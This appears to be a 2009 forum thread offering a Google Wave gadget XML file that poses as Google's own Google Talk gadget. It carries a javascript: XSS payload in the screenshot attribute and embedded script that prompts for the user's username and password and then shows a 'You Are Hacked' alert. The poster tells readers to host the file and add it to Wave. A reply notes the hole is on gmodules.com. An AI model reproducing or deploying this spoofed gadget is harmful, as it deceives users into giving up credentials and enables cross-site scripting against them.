i have google wave account & trying to develop some gadgets .....
with xml file google gadget support javascript..!!
so we can do many booom with this features...!!


just try


<Module>
<ModulePrefs title="Google Talk" description="See your contacts and send instant messages." author="Google Talk Team" author_affiliation="Google, Inc." author_location="Kirkland, WA" screenshot="javascript:alert(/XSS! document.domain=/.source+document.domain)" thumbnail="http://talkgadget.google.com/talkgadget/googletalk-thm.png" category="communication" category2="tools" height="451" render_inline="optional">
<Locale lang="en" country="us"/>
</ModulePrefs>
<Content type="html">
<![CDATA[
<script type="text/javascript">
var uname=prompt("Enter Your Username");
var pass=prompt("Enter Your Password");
window.open("http://jaiminbhagat.wordpress.com");
alert("You Are Hacked By Ejoker....Muhahahahha");
</script>

]]>
</Content>
</Module>


copy this & save as .xml file
& upload to any free hosting site...!!
add that url to google wave gadgets...!!
you can do lot more things with feature...!!
if havnt wave ID request me here or on my blog...!!
http://jaiminbhagat.wordpress.com

not xss on google wave.. is xss on gmodules.com and google doesnt care
http://ha.ckers.org/blog/20070817/xss-hole-in-google-apps-is-expected-behavior/

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 12/06/2009 08:55PM by sirdarckcat.